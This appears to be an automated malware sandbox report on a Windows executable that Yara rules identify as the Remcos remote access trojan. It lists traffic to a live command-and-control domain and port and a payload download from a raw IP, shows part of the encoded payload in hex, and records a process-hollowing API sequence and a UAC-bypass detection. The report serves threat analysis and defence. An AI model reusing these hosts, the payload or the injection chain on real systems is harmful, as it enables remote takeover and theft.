            Jul 2, 2024 08:24:39.458005905 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458017111 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458018064 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.458026886 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458036900 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458050013 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458062887 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.458064079 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458070993 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458107948 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.458853960 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458870888 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458882093 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458893061 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458904028 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458914995 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458925009 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458930016 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.458936930 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458946943 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458957911 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458964109 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.458969116 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458980083 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.458982944 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.458992004 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.459001064 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.459006071 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.459022045 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.459037066 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.459579945 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.459595919 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.459641933 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.473774910 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.473825932 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.473845959 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.473859072 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.473870039 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.473882914 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.473912001 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.473961115 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.473973989 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.474024057 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.484764099 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.525566101 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525619030 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525635958 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525649071 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525660992 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525770903 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525784016 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525842905 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.525842905 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.525842905 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.525891066 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525902987 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525914907 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.525957108 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526093960 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526107073 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526119947 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526143074 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526159048 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526206017 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526287079 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526299000 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526310921 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526319981 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526321888 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526334047 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526352882 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526372910 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526715994 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526736021 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526750088 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526762009 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526772976 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526784897 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526787043 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526797056 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526812077 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526818991 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526829958 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.526830912 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.526855946 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.544399023 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.544464111 CEST8049699176.223.134.190192.168.2.7
            Jul 2, 2024 08:24:39.544537067 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.590198994 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:24:39.898829937 CEST497002200192.168.2.791.92.242.76
            Jul 2, 2024 08:24:39.903845072 CEST22004970091.92.242.76192.168.2.7
            Jul 2, 2024 08:24:39.903929949 CEST497002200192.168.2.791.92.242.76
            Jul 2, 2024 08:24:39.916186094 CEST497002200192.168.2.791.92.242.76
            Jul 2, 2024 08:24:39.920984983 CEST22004970091.92.242.76192.168.2.7
            Jul 2, 2024 08:24:40.009155035 CEST4969980192.168.2.7176.223.134.190
            Jul 2, 2024 08:25:01.302472115 CEST22004970091.92.242.76192.168.2.7
            Jul 2, 2024 08:25:01.304529905 CEST497002200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:01.304702044 CEST497002200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:01.309434891 CEST22004970091.92.242.76192.168.2.7
            Jul 2, 2024 08:25:02.331665039 CEST497072200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:02.336606026 CEST22004970791.92.242.76192.168.2.7
            Jul 2, 2024 08:25:02.336682081 CEST497072200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:02.344170094 CEST497072200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:02.349165916 CEST22004970791.92.242.76192.168.2.7
            Jul 2, 2024 08:25:23.720813990 CEST22004970791.92.242.76192.168.2.7
            Jul 2, 2024 08:25:23.720920086 CEST497072200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:23.721014977 CEST497072200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:23.725828886 CEST22004970791.92.242.76192.168.2.7
            Jul 2, 2024 08:25:24.732142925 CEST497082200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:24.736977100 CEST22004970891.92.242.76192.168.2.7
            Jul 2, 2024 08:25:24.737065077 CEST497082200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:24.740715981 CEST497082200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:24.745755911 CEST22004970891.92.242.76192.168.2.7
            Jul 2, 2024 08:25:46.096180916 CEST22004970891.92.242.76192.168.2.7
            Jul 2, 2024 08:25:46.096421957 CEST497082200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:46.096563101 CEST497082200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:46.101361990 CEST22004970891.92.242.76192.168.2.7
            Jul 2, 2024 08:25:47.229595900 CEST497102200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:47.235529900 CEST22004971091.92.242.76192.168.2.7
            Jul 2, 2024 08:25:47.235632896 CEST497102200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:47.239051104 CEST497102200192.168.2.791.92.242.76
            Jul 2, 2024 08:25:47.245178938 CEST22004971091.92.242.76192.168.2.7
            Jul 2, 2024 08:26:08.610291958 CEST22004971091.92.242.76192.168.2.7
            Jul 2, 2024 08:26:08.610431910 CEST497102200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:08.610578060 CEST497102200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:08.615292072 CEST22004971091.92.242.76192.168.2.7
            Jul 2, 2024 08:26:09.622750044 CEST497112200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:09.627794981 CEST22004971191.92.242.76192.168.2.7
            Jul 2, 2024 08:26:09.627901077 CEST497112200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:09.631424904 CEST497112200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:09.638535976 CEST22004971191.92.242.76192.168.2.7
            Jul 2, 2024 08:26:31.017460108 CEST22004971191.92.242.76192.168.2.7
            Jul 2, 2024 08:26:31.017571926 CEST497112200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:31.017666101 CEST497112200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:31.022409916 CEST22004971191.92.242.76192.168.2.7
            Jul 2, 2024 08:26:32.029685974 CEST497122200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:32.035171032 CEST22004971291.92.242.76192.168.2.7
            Jul 2, 2024 08:26:32.035317898 CEST497122200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:32.044465065 CEST497122200192.168.2.791.92.242.76
            Jul 2, 2024 08:26:32.049376965 CEST22004971291.92.242.76192.168.2.7
            TimestampSource PortDest PortSource IPDest IP
            Jul 2, 2024 08:24:39.715821028 CEST6505053192.168.2.71.1.1.1
            Jul 2, 2024 08:24:39.836703062 CEST53650501.1.1.1192.168.2.7
            Jul 2, 2024 08:25:47.106467962 CEST6017353192.168.2.71.1.1.1
            Jul 2, 2024 08:25:47.228163004 CEST53601731.1.1.1192.168.2.7
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 2, 2024 08:24:39.715821028 CEST192.168.2.71.1.1.10x9686Standard query (0)narutochwan.duckdns.orgA (IP address)IN (0x0001)false
            Jul 2, 2024 08:25:47.106467962 CEST192.168.2.71.1.1.10xbaabStandard query (0)narutochwan.duckdns.orgA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 2, 2024 08:24:39.836703062 CEST1.1.1.1192.168.2.70x9686No error (0)narutochwan.duckdns.org91.92.242.76A (IP address)IN (0x0001)false
            Jul 2, 2024 08:25:47.228163004 CEST1.1.1.1192.168.2.70xbaabNo error (0)narutochwan.duckdns.org91.92.242.76A (IP address)IN (0x0001)false
            • 176.223.134.190
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.749699176.223.134.190806664C:\Users\user\Desktop\1vQ6RSHmz5.exe
            TimestampBytes transferredDirectionData
            Jul 2, 2024 08:24:38.257392883 CEST157OUTGET /x/re.txt HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
            Host: 176.223.134.190
            Jul 2, 2024 08:24:38.930342913 CEST1236INHTTP/1.1 200 OK
            Date: Tue, 02 Jul 2024 06:24:38 GMT
            Server: Apache/2.4.59 (Debian)
            Last-Modified: Thu, 27 Jun 2024 12:20:39 GMT
            ETag: "78c00-61bde28a733c0"
            Accept-Ranges: bytes
            Content-Length: 494592
            Content-Disposition: attachment
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/octet-stream
            Data Raw: 5a 67 9d 0d 10 0d 0d 0d 11 0d 0d 0d 0c 0c 0d 0d c5 0d 0d 0d 0d 0d 0d 0d 4d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 1d 0e 0d 0d 1b 2c c7 1b 0d c1 16 da 2e c5 0e 59 da 2e 61 75 76 80 2d 7d 7f 7c 74 7f 6e 7a 2d 70 6e 7b 7b 7c 81 2d 6f 72 2d 7f 82 7b 2d 76 7b 2d 51 5c 60 2d 7a 7c 71 72 3b 1a 1a 17 31 0d 0d 0d 0d 0d 0d 0d 19 a8 c8 3a 55 07 e2 8b 55 07 e2 8b 55 07 e2 8b 09 73 31 8b 68 07 e2 8b 09 73 33 8b fc 07 e2 8b 09 73 34 8b 63 07 e2 8b 4e 8f 5e 8b 56 07 e2 8b e3 67 1f 8b 57 07 e2 8b f2 b1 e3 8c 5f 07 e2 8b f2 b1 dd 8c 7f 07 e2 8b f2 b1 de 8c 77 07 e2 8b 4e 8f 53 8b 5e 07 e2 8b 55 07 e1 8b 82 08 e2 8b 0c b1 e9 8c 39 07 e2 8b 0c b1 37 8b 56 07 e2 8b 0c b1 e4 8c 56 07 e2 8b 5f 76 70 75 55 07 e2 8b 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 5d 52 0d 0d 59 0e 14 0d 65 99 7f 73 0d 0d 0d 0d 0d 0d 0d 0d ed 0d 0f 0e 18 0e 1b 0d 0d 7f 12 0d 0d 23 0f 0d 0d 0d 0d 0d fc 56 10 0d 0d 1d 0d 0d 0d 9d 12 0d 0d 0d 4d 0d 0d 1d 0d 0d 0d 0f 0d 0d 12 0d [TRUNCATED]
            Data Ascii: ZgM,.Y.auv-}|tnz-pn{{|-or-{-v{-Q\`-z|qr;1:UUUs1hs3s4cN^VgW_wNS^U97VV_vpuU]RYes#VM-WHME%M;r~-m;qnnMM;qnnQjM;y}M;tsvq=MM;pWYMM;ry|pHI]MO
            Jul 2, 2024 08:24:38.930387974 CEST1236INData Raw: 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d
            Data Ascii: qZTuRiDfZTuRSDfZTu)R=DfwM\DfZT^Iu3RDfwZTCuJR
            Jul 2, 2024 08:24:38.930402040 CEST1236INData Raw: f5 65 54 0d f5 a5 3f 0d 0d 75 1e 8e 52 0d f5 14 40 10 0d 66 d0 c6 dd 65 54 0d f5 77 19 0d 0d 75 28 8e 52 0d f5 fe 3f 10 0d 66 d0 c6 75 66 54 0d f5 61 19 0d 0d 75 32 8e 52 0d f5 e8 3f 10 0d 66 d0 77 0d c6 8d 66 54 0d f5 61 3f 0d 0d 75 3c 8e 52 0d
            Data Ascii: eT?uR@feTwu(R?fufTau2R?fwfTa?u<R?fuSuMS"R]"RYeTgTuFR?fe-TJuPR?fuZR{?fudRo?funRc?f.TJuxRM?fQ1]
            Jul 2, 2024 08:24:38.930516958 CEST1236INData Raw: 37 54 0d 9a 99 31 dd 0d 0d 0d f5 8b 14 0d 0d 5d 63 c7 a5 5a 54 0d 9a 99 31 c5 0d 0d 0d f5 f2 22 0d 0d 66 98 dd 9a 99 31 a9 0d 0d 0d f5 53 22 0d 0d 66 98 dd 9a 99 31 8d 0d 0d 0d f5 b3 22 0d 0d 66 98 dd 9a 59 31 71 f5 38 22 0d 0d 66 98 dd 9a 59 31
            Data Ascii: 7T1]cZT1"f1S"f1"fY1q8"fY1U"fY19"f]Y1!VY15CY1M:Y1e1Y1}(1111xTZTw-]B7T"QRxTJaxT
            Jul 2, 2024 08:24:38.930530071 CEST1236INData Raw: cd 37 54 0d 0c 22 51 a1 52 0d c6 89 5a 54 0d f5 a6 0e 0d 0d 77 2d b0 95 37 54 0d ae d1 37 54 0d 63 0c 42 cd 37 54 0d b0 99 37 54 0d 40 cd b0 9d 37 54 0d b0 a1 37 54 0d b0 a5 37 54 0d b0 a9 37 54 0d 0c 22 75 a1 52 0d 77 2d 63 0c 42 cd 37 54 0d 0c
            Data Ascii: 7T"QRZTw-7T7TcB7T7T@7T7T7T7T"uRw-cB7T"]RY1kj!ca1Hx%kRh^`cdreZT^/r^vfv=ZZqlkhj
            Jul 2, 2024 08:24:38.930541039 CEST1236INData Raw: 0c 98 05 64 98 dc f5 96 11 0d 0d 5d 98 db f5 3b 0c 0c 0c 98 d5 f5 9f 11 0d 0d 98 5c 1d 9a 11 55 98 59 31 1d 5d f5 61 11 0d 0d 98 51 31 19 6c 6b cf 11 0d 63 98 fe f5 13 0c 0c 0c 5d 98 d5 f5 5e 11 0d 0d 5d 98 db f5 03 0b 0c 0c 98 d5 f5 67 11 0d 0d
            Data Ascii: d];\UY1]aQ1lkc]^]gY1]/Q1k`bcd1!Q0N^]]d5c]f]|3#bww
            Jul 2, 2024 08:24:38.930555105 CEST1236INData Raw: d0 f6 82 13 0d 0d 90 89 31 11 0d 60 98 e6 81 37 f5 7c 07 0c 0c 46 51 31 15 7f 2c 63 98 d8 f5 81 07 0c 0c 98 d8 98 3d f5 65 07 0c 0c 9a 11 7d 6b 48 51 31 15 83 11 bd 0e f8 0f 3f cd 68 cf 11 0d 63 64 98 06 f5 47 11 0d 0d 98 81 31 19 98 dc 48 d3 7f
            Data Ascii: 1`7|FQ1,c=e}kHQ1?hcdG1HeF= A=c?1,'"HO]w&clk[b^cZr^}}]}ffkjcHQ1k
            Jul 2, 2024 08:24:38.930711031 CEST1000INData Raw: 0c 38 f8 9a 19 85 98 d2 38 d4 5d 9a 11 66 5d 5e f5 44 f6 0c 0c 90 d1 19 62 98 db f5 ca 08 0c 0c 6c 98 d3 6b 6a 68 cf 15 0d 75 69 6b 53 0d f5 0b 32 10 0d d9 c5 e8 8a 52 0d f5 7d 5a 12 0d 90 f9 1d 60 63 64 96 72 fd 98 06 96 8a f5 98 82 15 90 db 1c
            Data Ascii: 88]f]^DblkjhuikS2R}Z`cdr)H?R@RH8bHArS]=RZErRRRM]ZRRh:MZj(`
            Jul 2, 2024 08:24:38.930778027 CEST1236INData Raw: 64 9a 52 09 98 06 5d f5 69 ff 0c 0c 98 dc 98 3d 9a 52 05 5d f5 97 ff 0c 0c 0c 82 19 98 dc 0c 82 15 63 0c 3d f5 09 0d 0d 0d 6c 6b 98 f2 6a cf 15 0d 98 51 31 11 d0 62 98 f9 5e 5e 63 64 9a 52 09 98 06 5d f5 e7 00 0c 0c 98 dc 98 3d 9a 52 05 5d f5 12
            Data Ascii: dR]i=R]c=lkjQ1b^^cdR]=R]c=!lkjbcf]kjLcLkc1]1c]k^A1^e@NNnn!`cd
            Jul 2, 2024 08:24:38.930789948 CEST1236INData Raw: f5 b8 ff 0c 0c 91 cd 81 7c 98 51 31 29 98 db 0c 3d f5 eb f9 0c 0c 5d 98 db f5 e3 f9 0c 0c 9a 11 85 5d f5 76 ed 0c 0c 90 d1 19 64 48 81 31 29 82 2f 98 db f5 c9 f9 0c 0c 9a 19 48 92 e8 1c 52 e6 98 db 9a 11 65 5d f5 b6 f9 0c 0c 5d f5 4c ed 0c 0c f8
            Data Ascii: |Q1)=]]vdH1)/HRe]]L'Y1)e]]bjlkhbcd1ZHC`)F2w`$1%d7`]hlkjcd1d
            Jul 2, 2024 08:24:38.935498953 CEST1236INData Raw: 31 62 f5 26 f5 0c 0c 9a 11 7d 98 dc 5d f5 1b f5 0c 0c 9a 11 65 f6 8d 0e 0d 0d 48 89 31 31 81 58 5e 98 dc f5 05 f4 0c 0c 98 59 31 31 10 d8 9a 11 55 98 dc 5d f5 f4 f4 0c 0c 9a 19 38 9a 11 55 5d f5 84 e8 0c 0c 98 59 31 3d 90 d1 19 62 f5 db f4 0c 0c
            Data Ascii: 1b&}]eH11X^Y11U]8U]Y1=b}]e]OBHSb}]e]>19Y11U]8UHB^lY11U][8U]bD&!a


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:02:24:37
            Start date:02/07/2024
            Path:C:\Users\user\Desktop\1vQ6RSHmz5.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\1vQ6RSHmz5.exe"
            Imagebase:0x400000
            File size:24'576 bytes
            MD5 hash:566705AFEB33D5A977708328CDA48F1C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:02:24:39
            Start date:02/07/2024
            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
            Imagebase:0xdd0000
            File size:828'368 bytes
            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
            Reputation:moderate
            Has exited:false

            Reset < >

              Execution Graph

              Execution Coverage:22.5%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:70
              Total number of Limit Nodes:5
              execution_graph 254 401310 #100 255 403370 __vbaStrCopy 263 4031a0 9 API calls 255->263 257 4033c8 __vbaAryMove #558 258 4033f9 257->258 259 40341a __vbaAryDestruct __vbaAryDestruct __vbaFreeStr 257->259 267 403020 __vbaLbound __vbaUbound __vbaRedim __vbaUbound __vbaLbound 258->267 261 403407 __vbaAryMove 277 403450 __vbaStrCopy 261->277 264 403304 __vbaFreeObj 263->264 265 4032cf __vbaLateMemCallLd __vbaVar2Vec __vbaAryMove __vbaFreeVar 263->265 264->257 265->264 273 403099 267->273 268 403148 __vbaAryMove 270 40316a __vbaAryDestruct 268->270 269 4030cb __vbaGenerateBoundsError 269->273 270->261 271 4030c0 __vbaGenerateBoundsError 271->273 272 4030f7 __vbaGenerateBoundsError 272->273 273->268 273->269 273->271 273->272 274 40318d __vbaErrorOverflow 273->274 275 4030ef __vbaGenerateBoundsError 273->275 276 40312b __vbaUI1I2 273->276 275->273 276->273 276->274 280 403480 __vbaStrCopy 277->280 279 403470 279->259 313 4038d0 __vbaStrCopy __vbaStrCopy __vbaLenBstr 280->313 282 4034f4 __vbaVarMove 283 4038d0 17 API calls 282->283 284 403517 __vbaVarCat __vbaVarMove __vbaFreeVar 283->284 285 4038d0 17 API calls 284->285 286 40354d __vbaVarCat __vbaVarMove __vbaFreeVar 285->286 287 4038d0 17 API calls 286->287 288 40357b __vbaVarCat __vbaVarMove __vbaFreeVar 287->288 289 4038d0 17 API calls 288->289 290 4035a9 __vbaVarCat __vbaVarMove __vbaFreeVar 289->290 291 4038d0 17 API calls 290->291 292 4035d7 10 API calls 291->292 297 40368f 292->297 293 403771 __vbaAryLock 294 4037a5 __vbaGenerateBoundsError 293->294 295 403786 293->295 300 4037ae #644 __vbaAryUnlock #644 __vbaAryLock 294->300 295->294 299 40378c 295->299 296 4036dc __vbaGenerateBoundsError 298 4036e8 8 API calls 296->298 297->293 297->296 297->298 301 4036c8 __vbaGenerateBoundsError 297->301 302 4038c2 __vbaErrorOverflow 297->302 298->297 298->302 303 4037a1 299->303 304 403798 __vbaGenerateBoundsError 299->304 305 4037f1 300->305 306 40381a __vbaGenerateBoundsError 300->306 301->297 303->300 304->303 305->306 308 4037f7 305->308 307 403823 #644 __vbaAryUnlock 306->307 319 401934 307->319 308->307 310 403809 __vbaGenerateBoundsError 308->310 310->307 311 403845 CallWindowProcW 312 403890 __vbaAryDestruct __vbaFreeStr __vbaFreeVar 311->312 312->279 314 40393a 313->314 315 403943 10 API calls 314->315 316 4039c8 __vbaStrCopy 314->316 315->314 317 403a24 __vbaErrorOverflow 315->317 318 4039fd __vbaFreeStr __vbaFreeStr 316->318 318->282 320 40193d 319->320 325 403852 __vbaAryUnlock __vbaAryUnlock __vbaFreeStrList __vbaFreeVarList 326 401118 __vbaExceptHandler 321 40330b 322 403320 321->322 323 403311 __vbaAryDestruct 321->323 324 403322 __vbaFreeVarList __vbaAryDestruct 322->324 323->324 327 4039db 328 4039e1 __vbaFreeStr 327->328 329 4039ea __vbaFreeStr __vbaFreeVar 327->329 328->329 330 40315d __vbaAryDestruct

              Callgraph

              APIs
              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 004943BF
              • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 004943EA
              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 00494421
              • WriteProcessMemory.KERNELBASE ref: 0049446F
              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 00494555
              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945AD
              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945F9
              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 00494644
              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 00494664
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048B000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
